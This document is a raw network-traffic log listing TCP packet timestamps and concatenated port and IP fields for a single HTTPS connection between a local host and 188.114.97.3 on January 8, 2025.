                                                      Jan 8, 2025 13:55:10.648576021 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.649080992 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.649101019 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.649144888 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.649152040 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.649180889 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.681598902 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.681615114 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.681699038 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.681716919 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.682411909 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.682432890 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.682477951 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.682486057 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.682513952 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.711805105 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.711819887 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.711899042 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.711910963 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.711950064 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.714073896 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.714092016 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.714139938 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.714147091 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.714179993 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.717139959 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.717154980 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.717236042 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.717245102 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.741091013 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.741108894 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.741174936 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.741188049 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.741218090 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.741879940 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.741893053 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.741960049 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.741969109 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.742628098 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.742646933 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.742692947 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.742701054 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.742733002 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.774283886 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.774308920 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.774357080 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.774390936 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.774404049 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.804538012 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.804609060 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.804630995 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.804653883 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.804672956 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.804685116 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.804699898 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.804743052 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.804750919 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.804778099 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.807023048 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.807044029 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.807096004 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.807102919 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.807121038 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.809743881 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.809766054 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.809813976 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.809822083 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.809856892 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.833448887 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.833476067 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.833520889 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.833532095 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.833561897 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.834475040 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.834491014 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.834552050 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.834562063 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.835284948 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.835304976 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.835364103 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.835372925 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.835405111 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.866925955 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.866940975 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.867021084 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.867033958 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.897156000 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.897186995 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.897238970 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.897253036 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.897278070 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.897295952 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.897305965 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.897329092 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.897391081 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.899616003 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.899682045 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.899703026 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.899710894 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.899759054 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.905407906 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.905436039 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.905550957 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.905559063 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.905628920 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.925981045 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.926003933 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.926098108 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.926114082 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.926433086 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.926840067 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.926862955 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.926902056 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.926909924 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.926944017 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.926963091 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.927788973 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.927809000 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.927875042 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.927882910 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.930422068 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.959489107 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.959527969 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.959618092 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.959634066 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.959646940 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.959695101 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.989430904 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.989455938 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.989516020 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.989525080 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.989559889 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.989583015 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.989736080 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.989759922 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.989809036 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.989816904 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.989911079 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.991864920 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.991873980 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.991959095 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.991966963 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.992027998 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.997859955 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.997876883 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.997955084 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:10.997970104 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:10.998035908 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.018434048 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.018465042 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.018515110 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.018523932 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.018558979 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.018580914 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.019329071 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.019356012 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.019418955 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.019426107 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.019458055 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.019467115 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.020194054 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.020212889 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.020282030 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.020289898 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.020363092 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.056955099 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.056983948 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.057070971 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.057086945 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.057163954 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.082154989 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.082176924 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.082247019 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.082257986 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.082312107 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.082573891 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.082592010 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.082649946 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.082658052 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.082715988 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.084294081 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.084316969 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.084363937 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.084372044 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.084408998 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.084428072 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.090471029 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.090487003 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.090555906 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.090565920 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.090621948 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.110833883 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.110851049 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.110903025 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.110915899 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.110969067 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.111964941 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.111982107 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.112042904 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.112051010 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.112282991 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.144268990 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.144285917 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.144366026 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.144434929 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.144494057 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.174362898 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.174381018 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.174452066 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.174468994 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.174532890 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.174803019 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.174823999 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.174880981 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.174899101 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.175107956 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.175117970 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.175132036 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.175187111 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.175194979 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.175236940 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.176727057 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.176743031 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.176795959 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.176806927 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.176836014 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.176856995 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.182837009 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.182852030 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.182898998 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.182908058 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.182945013 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.182972908 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.203423023 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.203448057 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.203505039 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.203516960 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.203555107 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.203577042 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.204505920 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.204524040 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.204611063 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.204618931 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.204663038 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.236820936 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.236840963 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.236917973 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.236931086 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.236991882 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.266973019 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.266988993 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.267083883 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.267088890 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.267097950 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.267112970 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.267153978 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.267190933 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.267196894 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.267267942 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.267294884 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.267381907 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.267491102 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.267504930 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.267569065 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.267577887 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.267625093 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.267754078 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.267807007 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.271841049 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.271857023 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.271931887 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.271941900 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.305686951 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.305707932 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.305757999 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.305775881 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.305809021 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.306296110 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.306309938 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.306355000 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.306363106 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.306391954 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.329072952 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.329092979 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.329137087 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.329149008 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.329184055 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.329459906 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.329483032 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.329545975 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.329555988 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.359842062 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.359862089 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.359922886 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.359930038 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.359940052 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.359972954 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.359972000 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.359997034 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.360002041 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.360033989 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.360074997 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.361069918 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.361085892 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.361150980 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.361159086 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.361196041 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.364305973 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.364322901 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.364378929 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.364387989 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.364443064 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.398284912 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.398303032 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.398376942 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.398401022 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.398451090 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.399147987 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.399164915 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.399224043 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.399233103 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.399281979 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.421583891 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.421606064 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.421669006 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.421679020 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.421736956 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.452008009 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.452034950 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.452099085 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.452114105 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.452147007 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.452166080 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.452402115 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.452425003 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.452486038 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.452492952 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.452534914 CET49706443192.168.2.7188.114.97.3
                                                      Jan 8, 2025 13:55:11.452853918 CET44349706188.114.97.3192.168.2.7
                                                      Jan 8, 2025 13:55:11.452874899 CET44349706188.114.97.3192.168.2.7
